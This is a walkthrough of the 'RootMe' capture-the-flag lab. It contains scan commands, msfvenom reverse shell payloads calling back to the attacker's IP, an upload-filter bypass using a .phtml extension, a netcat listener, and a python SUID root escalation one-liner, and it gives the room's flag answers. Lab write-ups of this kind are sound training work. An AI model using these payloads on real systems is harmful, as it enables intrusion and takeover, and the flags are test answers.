
RootMe

This guide contains the answers for the RootMe room and the steps needed to reach them.


Reconnaissance

  1. Scan the machine, how many ports are open?

We use nmap for this with:

nmap -sV -sS 10.10.77.33 -p-

[Screenshot: Recon Nmap]

Answer: 2

  2. What version of Apache is running?

The Apache version can be seen in the scan output. If it is not shown, add the -sV argument.

Answer: 2.4.29

  3. What service is running on port 22?

This can also be found from the scan when using -sV.

Answer: ssh

  4. Find directories on the web server using the GoBuster tool.

  5. What is the hidden directory?

Finding hidden directories can be done with the following command:

gobuster dir -u 10.10.77.33:80 -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt

[Screenshot: Recon Directory]

One of the directories found is not a standard folder for a web server.

Answer: /panel/

Getting a shell

  1. user.txt

The first thing to do is create a reverse shell payload. My first attempt was to use msfvenom to create a Linux reverse TCP shell and output it as an .elf file.

msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=10.10.82.70 LPORT=1337 -f elf -o letmein.elf

[Screenshot: Shell Payload]

This can now be uploaded to the web server.

[Screenshot: Shell Upload]

Unfortunately, I did not get a connection, as the file was simply downloaded. We need to try a different format. PHP is another useful format for a reverse shell.

msfvenom -p php/reverse_php LHOST=10.10.82.70 LPORT=1337 -f raw > letmein.php

[Screenshot: Shell Payload Php]

[Screenshot: Shell Upload Php Fail]

The server doesn't let us upload a .php file. This might be bypassed by renaming the file extension. Simply renaming to .jpg.php did not work in this case, but .phtml did.

mv letmein.php letmein.phtml

[Screenshot: Shell Upload Php Rename]

[Screenshot: Shell Upload Php Success]

Now that it is uploaded, we start our listener again and click on the file we uploaded in the /uploads/ directory.

nc -nlvp 1337

[Screenshot: Shell Directory]

Although the shell connects to our machine, it never seems to be fully established, so another method is in order. A pre-made PHP reverse shell can be obtained from 'pentestmonkey' on GitHub.

[Screenshot: Shell Php Script]

We only need to add our own IP and port to listen on.

[Screenshot: Shell Php Script Edit]

Save this file with the .phtml extension and upload it to the server. Set up the listener on port 1337 and execute the file from the /uploads page.

[Screenshot: Shell Connection]

Success!

Now we can search for the file user.txt and open it to get our flag.

find / -name user.txt 2>/dev/null

[Screenshot: Shell Flag]

Answer: THM{y0u_g0t_a_sh3ll}

Privilege escalation

  1. Search for files with SUID permission, which file is weird?

Using the following command we can search for any binaries with their SUID bit set:

find / -perm -4000 2>/dev/null

[Screenshot: Priv SUID]

Answer: /usr/bin/python

  2. Find a form to escalate your privileges.

  3. root.txt

After we identify the outlier, we can go to the GTFOBins website to find out how this specific binary can be abused.

[Screenshot: Priv Gtfo]

We need to add the full path of the python binary on this machine to the GTFOBins command. Then we can simply run it in our shell.

/usr/bin/python -c 'import os; os.execl("/bin/sh", "sh", "-p")'

[Screenshot: Priv Escalation]

We got root access!

Now let's search for the root flag.

find /root -name root.txt 2>/dev/null

[Screenshot: Priv Root Flag]

Answer: THM{pr1v1l3g3_3sc4l4t10n}